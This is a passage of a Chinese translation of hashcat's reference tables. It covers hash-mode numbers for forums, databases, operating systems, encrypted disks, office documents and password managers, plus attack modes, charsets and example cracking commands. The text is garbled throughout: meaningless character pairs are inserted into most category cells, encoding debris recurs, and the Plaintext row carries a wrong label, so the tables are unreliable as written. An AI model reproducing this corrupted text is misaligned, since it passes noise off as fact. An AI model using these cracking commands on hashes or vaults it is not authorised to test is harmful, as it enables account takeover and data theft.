400 | phpBB3 (MD5) | 論壇熔掺,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)非剃,框架 |
2611 | vBulletin < v3.8.5 | 論壇瞬女,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)努潘,框架 |
2711 | vBulletin >= v3.8.5 | 論壇诽偷,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)疯坤,框架 |
2811 | MyBB 1.2+ | 論壇报慕,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)压怠,框架 |
2811 | IPB2+ (Invision Power Board) | 論壇眠冈,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)菌瘫,框架 |
8400 | WBB3 (Woltlab Burning Board) | 論壇蜗顽,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)雨让,框架 |
11 | Joomla < 2.5.18 | 論壇雇盖,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)栖忠,框架 |
400 | Joomla >= 2.5.18 (MD5) | 論壇崔挖,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)庵寞,框架 |
400 | WordPress (MD5) | 論壇狸相,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)捐川,框架 |
2612 | PHPS | 論壇脓鹃,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)古沥,框架 |
7900 | Drupal7 | 論壇瘸右,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)渐白,框架 |
21 | osCommerce | 論壇尊浓,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)纯衍,框架 |
21 | xt:Commerce | 論壇,內(nèi)容管理系統(tǒng)(CMS)苗胀,電子商務(wù)襟诸,框架 |
11000 | PrestaShop | 論壇瓦堵,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)歌亲,框架 |
124 | Django (SHA-1) | 論壇菇用,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)陷揪,框架 |
10000 | Django (PBKDF2-SHA256) | 論壇惋鸥,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)悍缠,框架 |
3711 | MediaWiki B type | 論壇卦绣,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)飞蚓,框架 |
13900 | OpenCart | 論壇滤港,內(nèi)容管理系統(tǒng)(CMS)品山,電子商務(wù)席吴,框架 |
4521 | Redmine | 論壇,內(nèi)容管理系統(tǒng)(CMS)计露,電子商務(wù)著榴,框架 |
4522 | PunBB | 論壇添履,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)脑又,框架 |
12001 | Atlassian (PBKDF2-HMAC-SHA1) | 論壇缝龄,內(nèi)容管理系統(tǒng)(CMS),電子商務(wù)挂谍,框架 |
12 | PostgreSQL | 數(shù)據(jù)庫服務(wù)器 |
131 | MSSQL (2000) | 數(shù)據(jù)庫服務(wù)器 |
132 | MSSQL (2005) | 數(shù)據(jù)庫服務(wù)器 |
1731 | MSSQL (2012, 2014) | 數(shù)據(jù)庫服務(wù)器 |
200 | MySQL323 | 數(shù)據(jù)庫服務(wù)器 |
300 | MySQL4.1/MySQL5 | 數(shù)據(jù)庫服務(wù)器 |
3100 | Oracle H: Type (Oracle 7+) | 數(shù)據(jù)庫服務(wù)器 |
112 | Oracle S: Type (Oracle 11+) | 數(shù)據(jù)庫服務(wù)器 |
12300 | Oracle T: Type (Oracle 12+) | 數(shù)據(jù)庫服務(wù)器 |
8000 | Sybase ASE | 數(shù)據(jù)庫服務(wù)器 |
141 | Episerver 6.x < .NET 4 | HTTP叔壤,SMTP,LDAP服務(wù)器 |
1441 | Episerver 6.x >= .NET 4 | HTTP口叙,SMTP炼绘,LDAP服務(wù)器 |
1600 | Apache MD5, md5apr1, MD5 (APR) | HTTP,SMTP妄田,LDAP服務(wù)器 |
12600 | ColdFusion 10+ | HTTP俺亮,SMTP,LDAP服務(wù)器 |
1421 | hMailServer | HTTP疟呐,SMTP脚曾,LDAP服務(wù)器 |
101 | nsldap, SHA-1(Base64), Netscape LDAP SHA | HTTP,SMTP启具,LDAP服務(wù)器 |
111 | nsldaps, SSHA-1(Base64), Netscape LDAP SSHA | HTTP本讥,SMTP,LDAP服務(wù)器 |
1411 | SSHA-256(Base64), LDAP {SSHA256} | HTTP,SMTP拷沸,LDAP服務(wù)器 |
1711 | SSHA-512(Base64), LDAP {SSHA512} | HTTP色查,SMTP,LDAP服務(wù)器 |
15000 | FileZilla Server >= 0.9.55 | FTP 服務(wù)器 |
11500 | CRC32 | 校驗和 |
3000 | LM | 操作系統(tǒng) |
1000 | NTLM | 操作系統(tǒng) |
1100 | Domain Cached Credentials (DCC), MS Cache | 操作系統(tǒng) |
2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2 | 操作系統(tǒng) |
12800 | MS-AzureSync PBKDF2-HMAC-SHA256 | 操作系統(tǒng) |
1500 | descrypt, DES (Unix), Traditional DES | 操作系統(tǒng) |
12400 | BSDiCrypt, Extended DES | 操作系統(tǒng) |
500 | md5crypt, MD5 (Unix), Cisco-IOS (MD5) | 操作系統(tǒng) |
3200 | bcrypt , Blowfish (Unix) | 操作系統(tǒng) |
7400 | sha256crypt , SHA256 (Unix) | 操作系統(tǒng) |
1800 | sha512crypt , SHA512 (Unix) | 操作系統(tǒng) |
122 | OSX v10.4, OSX v10.5, OSX v10.6 | 操作系統(tǒng) |
1722 | OSX v10.7 | 操作系統(tǒng) |
7100 | OSX v10.8+ (PBKDF2-SHA512) | 操作系統(tǒng) |
6300 | AIX {smd5} | 操作系統(tǒng) |
6700 | AIX {ssha1} | 操作系統(tǒng) |
6400 | AIX {ssha256} | 操作系統(tǒng) |
6500 | AIX {ssha512} | 操作系統(tǒng) |
2400 | Cisco-PIX MD5 | 操作系統(tǒng) |
2410 | Cisco-ASA MD5 | 操作系統(tǒng) |
500 | Cisco-IOS (MD5) | 操作系統(tǒng) |
5700 | Cisco-IOS type 4 (SHA256) | 操作系統(tǒng) |
9200 | Cisco-IOS (PBKDF2-SHA256) | 操作系統(tǒng) |
9300 | Cisco-IOS (scrypt) | 操作系統(tǒng) |
22 | Juniper NetScreen/SSG (ScreenOS) | 操作系統(tǒng) |
501 | Juniper IVE | 操作系統(tǒng) |
15100 | Juniper/NetBSD sha1crypt | 操作系統(tǒng) |
7000 | FortiGate (FortiOS) | 操作系統(tǒng) |
5800 | Samsung Android Password/PIN | 操作系統(tǒng) |
13800 | Windows Phone 8+ PIN/password | 操作系統(tǒng) |
8100 | Citrix NetScaler | 操作系統(tǒng) |
8500 | RACF | 操作系統(tǒng) |
7200 | GRUB 2 | 操作系統(tǒng) |
9900 | Radmin2 | 操作系統(tǒng) |
125 | ArubaOS | 操作系統(tǒng) |
7700 | SAP CODVN B (BCODE) | 企業(yè)應(yīng)用軟件(EAS) |
7800 | SAP CODVN F/G (PASSCODE) | 企業(yè)應(yīng)用軟件(EAS) |
10300 | SAP CODVN H (PWDSALTEDHASH) iSSHA-1 | 企業(yè)應(yīng)用軟件(EAS) |
8600 | Lotus Notes/Domino 5 | 企業(yè)應(yīng)用軟件(EAS) |
8700 | Lotus Notes/Domino 6 | 企業(yè)應(yīng)用軟件(EAS) |
9100 | Lotus Notes/Domino 8 | 企業(yè)應(yīng)用軟件(EAS) |
133 | PeopleSoft | 企業(yè)應(yīng)用軟件(EAS) |
13500 | PeopleSoft PS_TOKEN | 企業(yè)應(yīng)用軟件(EAS) |
11600 | 7-Zip | 壓縮/存檔 |
12500 | RAR3-hp | 壓縮/存檔 |
13000 | RAR5 | 壓縮/存檔 |
13200 | AxCrypt | 壓縮/存檔 |
13300 | AxCrypt in-memory SHA1 | 壓縮/存檔 |
13600 | WinZip | 壓縮/存檔 |
14700 | iTunes 備份 < 10.0 | 備份 |
14800 | iTunes 備份 >= 10.0 | 備份 |
62XY | TrueCrypt | 全盤加密(FDE) |
X | 1 = PBKDF2-HMAC-RIPEMD160 | 全盤加密(FDE) |
X | 2 = PBKDF2-HMAC-SHA512 | 全盤加密(FDE) |
X | 3 = PBKDF2-HMAC-Whirlpool | 全盤加密(FDE) |
X | 4 = PBKDF2-HMAC-RIPEMD160 + boot-mode | 全盤加密(FDE) |
Y | 1 = XTS 512 bit pure AES | 全盤加密(FDE) |
Y | 1 = XTS 512 bit pure Serpent | 全盤加密(FDE) |
Y | 1 = XTS 512 bit pure Twofish | 全盤加密(FDE) |
Y | 2 = XTS 1024 bit pure AES | 全盤加密(FDE) |
Y | 2 = XTS 1024 bit pure Serpent | 全盤加密(FDE) |
Y | 2 = XTS 1024 bit pure Twofish | 全盤加密(FDE) |
Y | 2 = XTS 1024 bit cascaded AES-Twofish | 全盤加密(FDE) |
Y | 2 = XTS 1024 bit cascaded Serpent-AES | 全盤加密(FDE) |
Y | 2 = XTS 1024 bit cascaded Twofish-Serpent | 全盤加密(FDE) |
Y | 3 = XTS 1536 bit all | 全盤加密(FDE) |
8800 | Android FDE <= 4.3 | 全盤加密(FDE) |
12900 | Android FDE (Samsung DEK) | 全盤加密(FDE) |
12200 | eCryptfs | 全盤加密(FDE) |
137XY | VeraCrypt | 全盤加密(FDE) |
X | 1 = PBKDF2-HMAC-RIPEMD160 | 全盤加密(FDE) |
X | 2 = PBKDF2-HMAC-SHA512 | 全盤加密(FDE) |
X | 3 = PBKDF2-HMAC-Whirlpool | 全盤加密(FDE) |
X | 4 = PBKDF2-HMAC-RIPEMD160 + boot-mode | 全盤加密(FDE) |
X | 5 = PBKDF2-HMAC-SHA256 | 全盤加密(FDE) |
X | 6 = PBKDF2-HMAC-SHA256 + boot-mode | 全盤加密(FDE) |
Y | 1 = XTS 512 bit pure AES | 全盤加密(FDE) |
Y | 1 = XTS 512 bit pure Serpent | 全盤加密(FDE) |
Y | 1 = XTS 512 bit pure Twofish | 全盤加密(FDE) |
Y | 2 = XTS 1024 bit pure AES | 全盤加密(FDE) |
Y | 2 = XTS 1024 bit pure Serpent | 全盤加密(FDE) |
Y | 2 = XTS 1024 bit pure Twofish | 全盤加密(FDE) |
Y | 2 = XTS 1024 bit cascaded AES-Twofish | 全盤加密(FDE) |
Y | 2 = XTS 1024 bit cascaded Serpent-AES | 全盤加密(FDE) |
Y | 2 = XTS 1024 bit cascaded Twofish-Serpent | 全盤加密(FDE) |
Y | 3 = XTS 1536 bit all | 全盤加密(FDE) |
14600 | LUKS | 全盤加密(FDE) |
9700 | MS Office <= 2003 1, MD5 + RC4 | 文檔 |
9710 | MS Office <= 2003 1, MD5 + RC4, collider #1 | 文檔 |
9720 | MS Office <= 2003 1, MD5 + RC4, collider #2 | 文檔 |
9800 | MS Office <= 2003 4, SHA1 + RC4 | 文檔 |
9810 | MS Office <= 2003 4, SHA1 + RC4, collider #1 | 文檔 |
9820 | MS Office <= 2003 4, SHA1 + RC4, collider #2 | 文檔 |
9400 | MS Office 2007 | 文檔 |
9500 | MS Office 2010 | 文檔 |
9600 | MS Office 2013 | 文檔 |
10400 | PDF 1.1 - 1.3 (Acrobat 2 - 4) | 文檔 |
10410 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #1 | 文檔 |
10420 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #2 | 文檔 |
10500 | PDF 1.4 - 1.6 (Acrobat 5 - 8) | 文檔 |
10600 | PDF 1.7 Level 3 (Acrobat 9) | 文檔 |
10700 | PDF 1.7 Level 8 (Acrobat 10 - 11) | 文檔 |
9000 | Password Safe v2 | 密碼管理軟件 |
5200 | Password Safe v3 | 密碼管理軟件 |
6800 | LastPass + LastPass sniffed | 密碼管理軟件 |
6600 | 1Password, agilekeychain | 密碼管理軟件 |
8200 | 1Password, cloudkeychain | 密碼管理軟件 |
11300 | Bitcoin/Litecoin wallet.dat | 密碼管理軟件 |
12700 | Blockchain, My Wallet | 密碼管理軟件 |
13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) | 密碼管理軟件 |
99999 | Plaintext | Blockchain明文撞芍,我的錢包 |
③ 輸出格式
編號 | 格式 |
---|---|
1 | hash[:salt] |
2 | plain |
3 | hash[:salt]:plain |
4 | hex_plain |
5 | hash[:salt]:hex_plain |
6 | plain:hex_plain |
7 | hash[:salt]:plain:hex_plain |
8 | crackpos |
9 | hash[:salt]:crack_pos |
10 | plain:crack_pos |
11 | hash[:salt]:plain:crack_pos |
12 | hex_plain:crack_pos |
13 | hash[:salt]:hex_plain:crack_pos |
14 | plain:hex_plain:crack_pos |
15 | hash[:salt]:plain:hex_plain:crack_pos |
④ 調(diào)試模式規(guī)則
編號 | 格式 |
---|---|
1 | 查找規(guī)則 |
2 | 原始詞 |
3 | 原始詞:查找規(guī)則 |
4 | 原始詞:查找規(guī)則:已處理詞 |
⑤ 攻擊模式
編號 | 模式 |
---|---|
0 | 直接 |
1 | 組合 |
3 | 暴力窮舉 |
6 | 混合 字典 + 掩碼 |
7 | 混合 掩碼 + 字典 |
⑥ 內(nèi)置字符集
? | 字符集 | |
---|---|---|
l | abcdefghijklmnopqrstuvwxyz | |
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ | |
d | 0123456789 | |
h | 0123456789abcdef | |
H | 0123456789ABCDEF | |
s | !"#$%&'()*+,-./:;<=>?@[]^_`{ | }~ |
a | ?l?u?d?s | |
b | 0x00 - 0xff |
⑦ OpenCL設(shè)備類型
編號 | 設(shè)備類型 |
---|---|
1 | CPU |
2 | GPU |
3 | 現(xiàn)場可編程門陣列(FPGA)秧了,數(shù)字信號處理器(DSP),協(xié)處理器(Co-Processor) |
⑧ 工作負載配置文件
編號 | 性能 | 運行時間 | 能量消耗 | 桌面影響 |
---|---|---|---|---|
1 | 低 | 2 ms | 低 | 最小 |
2 | 默認 | 12 ms | 經(jīng)濟型 | 可察覺 |
3 | 高 | 96 ms | 高 | 沒有反應(yīng) |
4 | 噩夢 | 480 ms | 瘋狂的 | 無法控制 |
⑨ 基本用例
攻擊模式 | Hash種類 | 示例命令 |
---|---|---|
字典 | hashcat -a 0 -m 400 example400.hash example.dict | |
字典+規(guī)則 | MD5 | hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule |
暴力窮舉 | MD5 | hashcat -a 3 -m 0 example0.hash ?a?a?a?a?a?a |
組合 | MD5 | hashcat -a 1 -m 0 example0.hash example.dict example.dict |